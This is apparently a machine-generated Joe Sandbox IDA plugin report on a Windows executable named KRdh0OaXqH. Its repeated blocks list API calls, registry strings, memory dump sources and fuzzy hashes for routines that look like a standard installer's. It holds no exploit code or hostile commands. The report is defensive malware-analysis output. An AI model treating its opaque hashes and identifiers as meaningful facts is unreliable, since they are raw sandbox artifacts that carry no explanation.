                                                                                            • Instruction Fuzzy Hash: 5D71B130B102049BCB00EF6998827AE77A5AF49716F50856BFC05DB383DB7C9E4D875A
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32 ref: 0045C2FA
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045C31A
                                                                                            • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045C327
                                                                                            • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045C334
                                                                                            • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045C342
                                                                                              • Part of subcall function 0045C1E8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C287,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C261
                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C535,?,?,00000000), ref: 0045C3FB
                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C535,?,?,00000000), ref: 0045C404
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                            • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                            • API String ID: 59345061-4263478283
                                                                                            • Opcode ID: 4113bb8dbcd17bfcbcc3a54e2f337fa89a8317241d30fe9918db60e1e55ed00a
                                                                                            • Instruction ID: 8ce8c74b38915e38562a90fe4681b9431f62f8b5bebe6c1e41ffef27034fd0c0
                                                                                            • Opcode Fuzzy Hash: 4113bb8dbcd17bfcbcc3a54e2f337fa89a8317241d30fe9918db60e1e55ed00a
                                                                                            • Instruction Fuzzy Hash: DF5163B1900708EFDB10DFD9C881BAEB7B8EB4D711F14806AF905B7241D678A945CFA9
                                                                                            APIs
                                                                                            • 73A14C40.GDI32(00000000,?,00000000,?), ref: 0041B3D3
                                                                                            • 73A14C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3DD
                                                                                            • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
                                                                                            • 73A16180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B406
                                                                                            • 73A0A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B412
                                                                                            • 73A14C00.GDI32(00000000,0000000B,?,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43F
                                                                                            • 73A0A480.USER32(00000000,00000000,0041B472,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B465
                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                            • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                            • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                            • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$Select$Delete$A16180A480A570Stretch
                                                                                            • String ID:
                                                                                            • API String ID: 3135053572-0
                                                                                            • Opcode ID: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                                            • Instruction ID: 9e854467c286a28b18f31183f63f6c048648830cb6dea2264be82148a8da808a
                                                                                            • Opcode Fuzzy Hash: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                                            • Instruction Fuzzy Hash: DC419D71E40619AFDF10EAE9D846FAFB7B8EF08704F104466B614FB281D67969408BA4
                                                                                            APIs
                                                                                              • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00471CA0
                                                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00471D9F
                                                                                            • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00471DB5
                                                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00471DDA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                            • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                            • API String ID: 971782779-3668018701
                                                                                            • Opcode ID: 0d3410c3bdf89c1015e05b6172e76740a58f53e74cadef7db015f49446f40693
                                                                                            • Instruction ID: db08b3a78c5346aa08fc53deac37c7c900aaeab2e7ee66e1d047288e3336f214
                                                                                            • Opcode Fuzzy Hash: 0d3410c3bdf89c1015e05b6172e76740a58f53e74cadef7db015f49446f40693
                                                                                            • Instruction Fuzzy Hash: 55D11374A00149AFDB11EFA9D882BDDB7F5AF48304F50806AF804B7391D778AE45CB69
                                                                                            APIs
                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                            • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,?,00000000,?,00000000,00454029,?,0045A28A,00000003,00000000,00000000,00454060), ref: 00453EA9
                                                                                              • Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                                            • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,00000000,?,00000004,00000000,00453F73,?,0045A28A,00000000,00000000,?,00000000,?,00000000), ref: 00453F2D
                                                                                            • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,00000000,?,00000004,00000000,00453F73,?,0045A28A,00000000,00000000,?,00000000,?,00000000), ref: 00453F5C
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453E00
                                                                                            • , xrefs: 00453E1A
                                                                                            • RegOpenKeyEx, xrefs: 00453E2C
                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453DC7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue$FormatMessageOpen
                                                                                            • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                            • API String ID: 2812809588-1577016196
                                                                                            • Opcode ID: b1af26e04a1ddbd00b5096240104ccc8619789e15be67a0962b146e22416e1b8
                                                                                            • Instruction ID: 0c0f272a557b88975729148cb7875cb844f630b1a696a545db65abb6b51d3efb
                                                                                            • Opcode Fuzzy Hash: b1af26e04a1ddbd00b5096240104ccc8619789e15be67a0962b146e22416e1b8
                                                                                            • Instruction Fuzzy Hash: 9D912271E04208ABDB11DF95D942BDEB7F8EB48745F10406BF901FB282D6789E09CB69
                                                                                            APIs
                                                                                              • Part of subcall function 00458A84: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458BC1,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458AD1
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458C1F
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458C89
                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458CF0
                                                                                            Strings
                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00458C3C
                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00458BD2
                                                                                            • v1.1.4322, xrefs: 00458CE2
                                                                                            • .NET Framework version %s not found, xrefs: 00458D29
                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00458CA3
                                                                                            • v4.0.30319, xrefs: 00458C11
                                                                                            • v2.0.50727, xrefs: 00458C7B
                                                                                            • .NET Framework not found, xrefs: 00458D3D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close$Open
                                                                                            • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                            • API String ID: 2976201327-446240816
                                                                                            • Opcode ID: 8254d5a6b390bed499ba7934cf142a416bdfe1caafdbe3dddb40a3d3832c2c59
                                                                                            • Instruction ID: 32352305a0336a12336774107b7ff5a8d04594bb7e4f1119dbb0a5d8803071dd
                                                                                            • Opcode Fuzzy Hash: 8254d5a6b390bed499ba7934cf142a416bdfe1caafdbe3dddb40a3d3832c2c59
                                                                                            • Instruction Fuzzy Hash: 7351D430A041485BCB00DB65C861BEE77B6DB99305F14447FE941EB393DF399A0E8B69
                                                                                            APIs
                                                                                            • CloseHandle.KERNEL32(?), ref: 0045819B
                                                                                            • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004581B7
                                                                                            • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004581C5
                                                                                            • GetExitCodeProcess.KERNEL32(?), ref: 004581D6
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045821D
                                                                                            • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458239
                                                                                            Strings
                                                                                            • Helper isn't responding; killing it., xrefs: 004581A7
                                                                                            • Helper process exited, but failed to get exit code., xrefs: 0045820F
                                                                                            • Stopping 64-bit helper process. (PID: %u), xrefs: 0045818D
                                                                                            • Helper process exited., xrefs: 004581E5
                                                                                            • Helper process exited with failure code: 0x%x, xrefs: 00458203
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                            • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                            • API String ID: 3355656108-1243109208
                                                                                            • Opcode ID: 9811c6cb40db8456fd5d766f3d0adf9b5719f814c8999e39bf7c18c375c74eaf
                                                                                            • Instruction ID: ca0659a1f7dd3987533feb970b51f52a81168d3092bf9212e29b303cc353bad7
                                                                                            • Opcode Fuzzy Hash: 9811c6cb40db8456fd5d766f3d0adf9b5719f814c8999e39bf7c18c375c74eaf
                                                                                            • Instruction Fuzzy Hash: 79217170604B409AD720E7B9C44574B7AD49F49305F048C6FF99AEB293DE78E8488B2A
                                                                                            APIs
                                                                                              • Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00453C1B,?,00000000,00453CDF), ref: 00453B6B
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00453C1B,?,00000000,00453CDF), ref: 00453CA7
                                                                                              • Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453AB3
                                                                                            • RegCreateKeyEx, xrefs: 00453ADF
                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453A83
                                                                                            • , xrefs: 00453ACD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateFormatMessageQueryValue
                                                                                            • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                            • API String ID: 2481121983-1280779767
                                                                                            • Opcode ID: 44ad0baa8eea8450781b5e4082410cae7738b89c9e6c0941fad1624c81a85519
                                                                                            • Instruction ID: 9af730bdb9cddd4578bad4c79146292dd217fd331dbe672fdf24ed7127d9b52a
                                                                                            • Opcode Fuzzy Hash: 44ad0baa8eea8450781b5e4082410cae7738b89c9e6c0941fad1624c81a85519
                                                                                            • Instruction Fuzzy Hash: 89811076A00209AFDB01DFD5C941BDEB7B9EF48345F50442AF900F7282D778AE498B69
                                                                                            APIs
                                                                                              • Part of subcall function 00452F1C: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045300B
                                                                                              • Part of subcall function 00452F1C: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045301B
                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00495129
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,0049527D), ref: 0049514A
                                                                                            • CreateWindowExA.USER32(00000000,STATIC,0049528C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00495171
                                                                                            • SetWindowLongA.USER32(?,000000FC,00494904), ref: 00495184
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000,STATIC,0049528C), ref: 004951B4
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00495228
                                                                                            • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000), ref: 00495234
                                                                                              • Part of subcall function 0045326C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453353
                                                                                            • 73A15CF0.USER32(?,00495257,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000,STATIC), ref: 0049524A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                            • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                            • API String ID: 170458502-2312673372
                                                                                            • Opcode ID: f6557b622499f81c9b2921459e78cb07cf2f20039233d61e3ba364b89272a642
                                                                                            • Instruction ID: 9b82285d6c0ab0379da714a391ea46bab388e10fbcdfaad342ba26a277b4da99
                                                                                            • Opcode Fuzzy Hash: f6557b622499f81c9b2921459e78cb07cf2f20039233d61e3ba364b89272a642
                                                                                            • Instruction Fuzzy Hash: 8D416670A40608AFDF01EBA5DC52F9E7BF8EB09704F6045B6F500F7291D7799A008BA8
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CC14,00000000), ref: 0042E369
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E36F
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CC14,00000000), ref: 0042E3BD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressCloseHandleModuleProc
                                                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll$mVE
                                                                                            • API String ID: 4190037839-37397897
                                                                                            • Opcode ID: 37e56631d33ffb8b797cbe9838f91edbc85ff6c3b76c647076f124bfd1bc8c2e
                                                                                            • Instruction ID: 8a20d89f11a8313c83dbe49676a31c52bde0b33a6882556ea6b203ed52161f1a
                                                                                            • Opcode Fuzzy Hash: 37e56631d33ffb8b797cbe9838f91edbc85ff6c3b76c647076f124bfd1bc8c2e
                                                                                            • Instruction Fuzzy Hash: 0C212570B00219AFDF10EBA7DC45A9F77A8EB44314F904477A500E7292EB7C9A05CB59
                                                                                            APIs
                                                                                            • GetActiveWindow.USER32 ref: 00462124
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462138
                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462145
                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462152
                                                                                            • GetWindowRect.USER32(?,00000000), ref: 0046219E
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 004621DC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                            • API String ID: 2610873146-3407710046
                                                                                            • Opcode ID: c8ec920afe0f29cf0b992a0366f0fdec1bc44dc6b16cd197f8c896cb5c85a552
                                                                                            • Instruction ID: fd6996cff919b5887080f465a26ac3447cdf71e0405d1b359808dab19ab714f4
                                                                                            • Opcode Fuzzy Hash: c8ec920afe0f29cf0b992a0366f0fdec1bc44dc6b16cd197f8c896cb5c85a552
                                                                                            • Instruction Fuzzy Hash: A7210771704B006BD300D664CD41F7B36D4EB85710F08052AFA84EB382EAB8DD018A9A
                                                                                            APIs
                                                                                            • GetActiveWindow.USER32 ref: 0042F008
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F01C
                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F029
                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F036
                                                                                            • GetWindowRect.USER32(?,00000000), ref: 0042F082
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F0C0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                            • API String ID: 2610873146-3407710046
                                                                                            • Opcode ID: a2ca17b2d76e23ba006245a128424af3baa9758b9a44ccde8e18ffc37df72414
                                                                                            • Instruction ID: f3027618da4b71ab9256091943579cea75a3e5d7718dd7814224cb4ba64d2bd0
                                                                                            • Opcode Fuzzy Hash: a2ca17b2d76e23ba006245a128424af3baa9758b9a44ccde8e18ffc37df72414
                                                                                            • Instruction Fuzzy Hash: 4D21A4767017146FD3109668DC81F3B37A9EB84B14F98453AF984DB382EA78EC048B99
                                                                                            APIs
                                                                                            • CoCreateInstance.OLE32(00498A68,00000000,00000001,00498774,?,00000000,00455D42), ref: 00455AC2
                                                                                            • CoCreateInstance.OLE32(00498764,00000000,00000001,00498774,?,00000000,00455D42), ref: 00455AE8
                                                                                            • SysFreeString.OLEAUT32(?), ref: 00455C47
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
